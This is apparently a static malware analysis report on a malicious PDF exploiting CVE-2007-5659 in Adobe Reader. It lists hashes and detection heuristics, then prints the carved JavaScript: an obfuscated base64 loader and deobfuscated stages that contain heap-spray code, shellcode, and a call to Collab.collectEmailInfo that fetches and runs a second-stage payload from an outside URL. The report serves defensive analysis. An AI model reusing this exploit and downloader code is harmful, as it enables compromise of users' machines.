Malicious PDF — malware analysis report

Static analysis result for SHA-256 83a300bf3c2eb620…

MALICIOUS

PDF

3.0 KB First seen: 2026-05-10
MD5: 04d6325678ccd1f9a1af454380bbaf7d SHA-1: b25d7814da5e47a8c88e01a0ccf184e4fcedea0d SHA-256: 83a300bf3c2eb62005c83a36667445fe6773fa6b295f0d5e4081cfb88878bb0a
258 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. This script is designed to download and execute a second-stage payload from the URL http://tthhllkk.info//getexe.php?spl=pdf_exp. The ML classifier strongly indicates maliciousness, and the exploit cluster confirms the presence of exploit code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://tthhllkk.info//getexe.php?spl=pdf_exp Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js pdf-javascript-stream PDF /JS object 9 at offset 0xD6 21209 bytes
SHA-256: 0b2130eace48f53fba08bf646701075bf4ef972c080e7d539c06f2c8b6ea1bde
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;
   input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
   do {
      enc1 = keyXXXStr.indexOf(input.charAt(i++));
      enc2 = keyXXXStr.indexOf(input.charAt(i++));
      enc3 = keyXXXStr.indexOf(input.charAt(i++));
      enc4 = keyXXXStr.indexOf(input.charAt(i++));
      chr1 = (enc1 << 2) | (enc2 >> 4);
      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
         output = output + String.fromCharCode(chr2);
      }
      if (enc4 != 64) {
         output = output + String.fromCharCode(chr3);
      }
   } while (i < input.length);
   return output;
}
var aasd = decode64("CiB2YXIgVE9GU0pUUEZVSFUgPSBuZXcgQXJyYXkoKTsKIHZhciBLNUJFYmJOSVJBMjsKIHZhciBsYXZlID0gZXZhbDsKICBsYXZlKHVuZXNjYXBlKCIlMjAlMjAlNjYlNzUlNmUlNjMlNzQlNjklNmYlNmUlMjAlNTIlNDklNGUlNzElNDQlNDklNmYlNmQlNjklMzclNTklMjglNDglNDYlNzElNGUlMzQlMzglNjQlNTglMzIlNjYlNjglMmMlMjAlNDUlNDclNTElNzUlNTIlNGIlNjclNTglNDklMzclNDUlMjklMjAlMjAlN2IlMjAlMjAlMjAlMjAlNzclNjglNjklNmMlNjUlMjglNDglNDYlNzElNGUlMzQlMzglNjQlNTglMzIlNjYlNjglMmUlNmMlNjUlNmUlNjclNzQlNjglMjAlMmElMjAlMzIlMjAlM2MlMjAlNDUlNDclNTElNzUlNTIlNGIlNjclNTglNDklMzclNDUlMjklMjAlMjAlMjAlMjAlN2IlMjAlMjAlMjAlMjAlMjAlMjAlNDglNDYlNzElNGUlMzQlMzglNjQlNTglMzIlNjYlNjglMjAlMmIlM2QlMjAlNDglNDYlNzElNGUlMzQlMzglNjQlNTglMzIlNjYlNjglM2IlMjAlMjAlMjAlMjAlN2QlMjAlMjAlMjAlMjAlNDglNDYlNzElNGUlMzQlMzglNjQlNTglMzIlNjYlNjglMjAlM2QlMjAlNDglNDYlNzElNGUlMzQlMzglNjQlNTglMzIlNjYlNjglMmUlNzMlNzUlNjIlNzMlNzQlNzIlNjklNmUlNjclMjglMzAlMmMlMjAlNDUlNDclNTElNzUlNTIlNGIlNjclNTglNDklMzclNDUlMjAlMmYlMjAlMzIlMjklM2IlMjAlMjAlMjAlMjAlNzIlNjUlNzQlNzUlNzIlNmUlMjAlNDglNDYlNzElNGUlMzQlMzglNjQlNTglMzIlNjYlNjglM2IlMjAlMjAlN2QlMjAiKSk7ICBsYXZlKHVuZXNjYXBlKCIlMjAlMjAlMjAlNjYlNzUlNmUlNjMlNzQlNjklNmYlNmUlMjAlNDYlMzclNTMlMzUlNmElNzIlNjMlNzglNzElNmYlNjclMjglNTklMzclNWElNmYlNzAlNTMlNDclNjclMzUlMzklMzUlMjklMjAlMjAlN2IlMjAlMjAlMjAlMjAlNjklNjYlMjglNTklMzclNWElNmYlNzAlNTMlNDclNjclMzUlMzklMzUlMjAlM2QlM2QlMjAlMzAlMjklMjAlMjAlMjAlMjAlN2IlMjAlMjAlMjAlMjAlMjAlMjAlNzYlNjElNzIlMjAlNjElNzAlNDElMzclNzYlMzIlNjUlNTIlMzAlNTUlNzElMjAlM2QlMjAlMzAlNzglMzAlNjMlMzAlNjMlMzAlNjMlMzAlNjMlM2IlMjAlMjAlMjAlMjAlMjAlMjAlNzYlNjElNzIlMjAlNjUlMzUlNTglMzklNGMlMzAlNmUlNzUlMzklNzYlNjYlMjAlM2QlMjAlMjAlNzUlNmUlNjUlNzMlNjMlNjElNzAlNjUlMjglMjIlMjUlNzUlNDMlMzAlMzMlMzMlMjUlNzUlMzglNDIlMzYlMzQlMjUlNzUlMzMlMzAlMzQlMzAlMjUlNzUlMzAlNDMlMzclMzglMjUlNzUlMzQlMzAlMzglNDIlMjUlNzUlMzglNDIlMzAlNDMlMjUlNzUlMzElNDMlMzclMzAlMjUlNzUlMzglNDIlNDElNDQlMjUlNzUlMzAlMzglMzUlMzglMjUlNzUlMzAlMzklNDUlNDIlMjUlNzUlMzQlMzAlMzglNDIlMjUlNzUlMzglNDQlMzMlMzQlMjUlNzUlMzclNDMlMzQlMzAlMjUlNzUlMzUlMzglMzglNDIlMjUlNzUlMzYlNDElMzMlNDMlMjUlNzUlMzUlNDElMzQlMzQlMjUlNzUlNDUlMzIlNDQlMzElMjUlNzUlNDUlMzIlMzIlNDIlMjUlNzUlNDUlNDMlMzglNDIlMjUlNzUlMzQlNDYlNDUlNDIlMjUlNzUlMzUlMzIlMzUlNDElMjUlNzUlNDUlNDElMzglMzMlMjUlNzUlMzglMzklMzUlMzYlMjUlNzUlMzAlMzQlMzUlMzUlMjUlNzUlMzUlMzclMzUlMzYlMjUlNzUlMzclMzMlMzglNDIlMjUlNzUlMzglNDIlMzMlNDMlMjUlNzUlMzMlMzMlMzclMzQlMjUlNzUlMzAlMzMlMzclMzglMjUlNzUlMzUlMzYlNDYlMzMlMjUlNzUlMzclMzYlMzglNDIlMjUlNzUlMzAlMzMlMzIlMzAlMjUlNzUlMzMlMzMlNDYlMzMlMjUlNzUlMzQlMzklNDMlMzklMjUlNzUlMzQlMzElMzUlMzAlMjUlNzUlMzMlMzMlNDElNDQlMjUlNzUlMzMlMzYlNDYlNDYlMjUlNzUlNDIlNDUlMzAlNDYlMjUlNzUlMzAlMzMlMzElMzQlMjUlNzUlNDYlMzIlMzMlMzglMjUlNzUlMzAlMzglMzclMzQlMjUlNzUlNDMlNDYlNDMlMzElMjUlNzUlMzAlMzMlMzAlNDQlMjUlNzUlMzQlMzAlNDYlNDElMjUlNzUlNDUlNDYlNDUlNDIlMjUlNzUlMzMlNDIlMzUlMzglMjUlNzUlMzclMzUlNDYlMzglMjUlNzUlMzUlNDUlNDUlMzUlMjUlNzUlMzQlMzYlMzglNDIlMjUlNzUlMzAlMzMlMzIlMzQlMjUlNzUlMzYlMzYlNDMlMzMlMjUlNzUlMzAlNDMlMzglNDIlMjUlNzUlMzglNDIlMzQlMzglMjUlNzUlMzElNDMlMzUlMzYlMjUlNzUlNDQlMzMlMzAlMzMlMjUlNzUlMzAlMzQlMzglNDIlMjUlNzUlMzAlMzMlMzglNDElMjUlNzUlMzUlNDYlNDMlMzMlMjUlNzUlMzUlMzAlMzUlNDUlMjUlNzUlMzglNDQlNDMlMzMlMjUlNzUlMzAlMzglMzclNDQlMjUlNzUlMzUlMzIlMzUlMzclMjUlNzUlMzMlMzMlNDIlMzglMjUlNzUlMzglNDElNDMlNDElMjUlNzUlNDUlMzglMzUlNDIlMjUlNzUlNDYlNDYlNDElMzIlMjUlNzUlNDYlNDYl
... (truncated)
generic_stage_recovery_000.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6 5218 bytes
SHA-256: b7279c5a95ad2923efbf197dcd9806860a056a237129522a52fc7a8dfd71bb91
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var TOFSJTPFUHU = new Array();
 var K5BEbbNIRA2;
 var lave = eval;
  lave(unescape("  function RINqDIomi7Y(HFqN48dX2fh, EGQuRKgXI7E)  {    while(HFqN48dX2fh.length * 2 < EGQuRKgXI7E)    {      HFqN48dX2fh += HFqN48dX2fh;    }    HFqN48dX2fh = HFqN48dX2fh.substring(0, EGQuRKgXI7E / 2);    return HFqN48dX2fh;  } "));  lave(unescape("   function F7S5jrcxqog(Y7ZopSGg595)  {    if(Y7ZopSGg595 == 0)    {      var apA7v2eR0Uq = 0x0c0c0c0c;      var e5X9L0nu9vf =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    else if(Y7ZopSGg595 == 1)    {      apA7v2eR0Uq = 0x30303030;      var e5X9L0nu9vf =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    else if(Y7ZopSGg595 == 2)    {      var e5X9L0nu9vf =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    var WTQCXKeh9iS = 0x400000;    var GRyoldQ8DAQ = e5X9L0nu9vf.length * 2;    var EGQuRKgXI7E = WTQCXKeh9iS - (GRyoldQ8DAQ + 0x38);    var HFqN48dX2fh = unescape("%u9090%u9090");    HFqN48dX2fh = RINqDIomi7Y(HFqN48dX2fh, EGQuRKgXI7E);    var sGlRgzQ8xQL = (apA7v2eR0Uq - 0x400000) / WTQCXKeh9iS;    for(var mDdlCzPy4Kj = 0; mDdlCzPy4Kj < sGlRgzQ8xQL; mDdlCzPy4Kj++)    {      TOFSJTPFUHU[mDdlCzPy4Kj] = HFqN48dX2fh + e5X9L0nu9vf;    }  } "));  lave(unescape("  function HzWWerfibUa()  {    var y4J9M0f3fVi = 0;    var GDQcEZ2fXmu = app.viewerVersion.toString();    app.clearTimeOut(K5BEbbNIRA2);    if((GDQcEZ2fXmu >= 8 && GDQcEZ2fXmu < 8.102) || GDQcEZ2fXmu < 7.1)    {      F7S5jrcxqog(0);      var kXVzQroEsZB = unescape("%u0c0c%u0c0c");      while(kXVzQroEsZB.length < 44952) kXVzQroEsZB += kXVzQroEsZB;      var U6spGZY3FDp = this;      var k5ADRt9Rrbp = Collab;      U6spGZY3FDp["collabStore"] = k5ADRt9Rrbp["collectEmailInfo"](      {        subj : "", msg : kXVzQroEsZB      }      );    }    if((GDQcEZ2fXmu >
... (truncated)
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6 5214 bytes
SHA-256: a614adfb2cdfc9fc710ceea55f85d06c0166b17683d698df5ec919763942be5d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var TOFSJTPFUHU = new Array();
 var K5BEbbNIRA2;
 var lave = eval;
  lave(unescape("  function RINqDIomi7Y(HFqN48dX2fh, EGQuRKgXI7E)  {    while(HFqN48dX2fh.length * 2 < EGQuRKgXI7E)    {      HFqN48dX2fh += HFqN48dX2fh;    }    HFqN48dX2fh = HFqN48dX2fh.substring(0, EGQuRKgXI7E / 2);    return HFqN48dX2fh;  } "));  lave(unescape("   function F7S5jrcxqog(Y7ZopSGg595)  {    if(Y7ZopSGg595 == 0)    {      var apA7v2eR0Uq = 0x0c0c0c0c;      var e5X9L0nu9vf =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    else if(Y7ZopSGg595 == 1)    {      apA7v2eR0Uq = 0x30303030;      var e5X9L0nu9vf =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    else if(Y7ZopSGg595 == 2)    {      var e5X9L0nu9vf =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    var WTQCXKeh9iS = 0x400000;    var GRyoldQ8DAQ = e5X9L0nu9vf.length * 2;    var EGQuRKgXI7E = WTQCXKeh9iS - (GRyoldQ8DAQ + 0x38);    var HFqN48dX2fh = unescape("%u9090%u9090");    HFqN48dX2fh = RINqDIomi7Y(HFqN48dX2fh, EGQuRKgXI7E);    var sGlRgzQ8xQL = (apA7v2eR0Uq - 0x400000) / WTQCXKeh9iS;    for(var mDdlCzPy4Kj = 0; mDdlCzPy4Kj < sGlRgzQ8xQL; mDdlCzPy4Kj++)    {      TOFSJTPFUHU[mDdlCzPy4Kj] = HFqN48dX2fh + e5X9L0nu9vf;    }  } "));  lave(unescape("  function HzWWerfibUa()  {    var y4J9M0f3fVi = 0;    var GDQcEZ2fXmu = app.viewerVersion.toString();    app.clearTimeOut(K5BEbbNIRA2);    if((GDQcEZ2fXmu >= 8 && GDQcEZ2fXmu < 8.102) || GDQcEZ2fXmu < 7.1)    {      F7S5jrcxqog(0);      var kXVzQroEsZB = unescape("%u0c0c%u0c0c");      while(kXVzQroEsZB.length < 44952) kXVzQroEsZB += kXVzQroEsZB;      var U6spGZY3FDp = this;      var k5ADRt9Rrbp = Collab;      U6spGZY3FDp["collabStore"] = k5ADRt9Rrbp["collectEmailInfo"](      {        subj : "", msg : kXVzQroEsZB      }      );    }    if((GDQcEZ2fXmu >
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.